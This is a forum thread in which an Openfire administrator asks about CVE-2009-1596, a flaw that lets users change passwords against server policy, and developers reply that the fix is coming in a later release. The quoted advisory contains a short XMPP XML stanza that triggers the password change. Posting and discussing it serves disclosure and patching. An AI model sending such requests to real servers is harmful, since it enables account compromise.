Openfire vulnerability CVE-2009-1596

Alpha_Seven · January 21, 2010, 5:20pm

Hello,

It looks like all Openfire versions are affected by a reported vulnerability described below:

**Openfire No-Password-Changes Security Bypass **

A vulnerability has been reported in Openfire, which can be exploited by malicious users to bypass certain security restrictions.

The vulnerability is caused due to Openfire not properly respecting the “no password changes” setting, which can be exploited to change passwords by sending jabber:iq:auth “passwd_change” requests to the server.
CVE-2009-1596

Authentication

High. Exploiting this issue can allow the attacker to gain unauthorized access to the affected application and to completely compromise victims’ accounts.

Moderate. The following example data is sufficient to trigger this issue:

<iq type=‘set’ id=‘passwd_change’>
<query xmlns=‘jabber:iq:auth’>
<username>test2</username>
<password>newillegalychangedpassword</password>
</query>
</iq>

The vendor has released an update:
http://www.igniterealtime.org/projects/openfire/index.jsp

212.8.163.209

Here’s the proof of concept code:

test.user
newillegalychangedpassword

Do you know if there’s any patch available to fix this? If not, we might have to shutdown our corporate server until it’s fixed.

Regards,

Alpha.

guus · January 21, 2010, 5:33pm

The vulnerability report as presented on NVD links to our JIRA issue that tracks this problem: OF-221. It has been resolved and will be included in the next release (3.6.5) of Openfire.

Alpha_Seven · January 21, 2010, 5:39pm

Is there any timeline for 3.6.5 release or any workaround in the meantime?

akrherz · January 21, 2010, 6:34pm

Hello,

There is no workaround as this change was required to support it:

change 11136

The more dangerous exploit was fixed in 3.6.4, where you could change the password of any user and not just yourself.

daryl